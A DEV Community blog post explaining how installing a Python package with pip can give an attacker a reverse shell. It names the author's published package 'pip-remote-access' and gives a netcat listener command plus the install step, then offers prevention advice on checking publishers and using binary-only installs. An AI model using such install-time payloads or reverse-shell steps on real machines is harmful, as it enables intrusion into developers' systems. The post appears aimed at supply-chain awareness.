DEV Community πŸ‘©β€πŸ’»πŸ‘¨β€πŸ’»

DEV Community πŸ‘©β€πŸ’»πŸ‘¨β€πŸ’» is a community of 963,274 amazing developers

We're a place where coders share, stay up-to-date and grow their careers.

Create account Log in
Cover image for Hacking and Getting Remote Access with PIP
Ansari
Ansari

Posted on

Hacking and Getting Remote Access with PIP

RCE with pip ? Yes you read it right.

First before getting our hands dirty, lets see what is pip
Most Python developers would obviously knows what is pip.
For other developers, pip is the package installer for Python. You can use pip to install packages from the Python Package Index and other indexes. It is npm, apt, homebrew (Some other package manager you name it) for python.

How does it works

Let's assume you wanna send http request from python well you could use famous package name requests
To get requests package on your computer, you will using the command :
pip install requests That's it.
This will install the package and you can use the package can be used by importing the package.

So how the pip install works, Simple it gets the source code from the server and execute the script in your computer and install the requirements, this is how pip install works.

What if you write your own reverse shell package ?

That's what I did, I wrote a package which allows the attacker to get the reverse shell of the victim.
I didn't want to make a global reverse shell thing, so i simply wrote the script to be executed on locally on the machine.

Here's the demo video check it out: Link
The package is available: Link

  1. First listen on 1234 port with nc nc -lvp 1234
  2. Now install the package pip install pip-remote-access

Now the listener will get the reverse shell.

How to prevent this ?

This module is to show and create a awareness among developers, So when installing package verify that it is legal verified publisher.
PyPi.org doesn't checks the github page whether it was the appropriate right developer, It just get whatever github the developer gives and displays the stars and forks from it.
So better get into the github page of the package and check the page, this way you also get to know the code.
Install the package with binary only mode it will be much more safe.

Top comments (0)

Update Your DEV Experience Level:

Settings

Go to your customization settings to nudge your home feed to show content more relevant to your developer experience level. πŸ›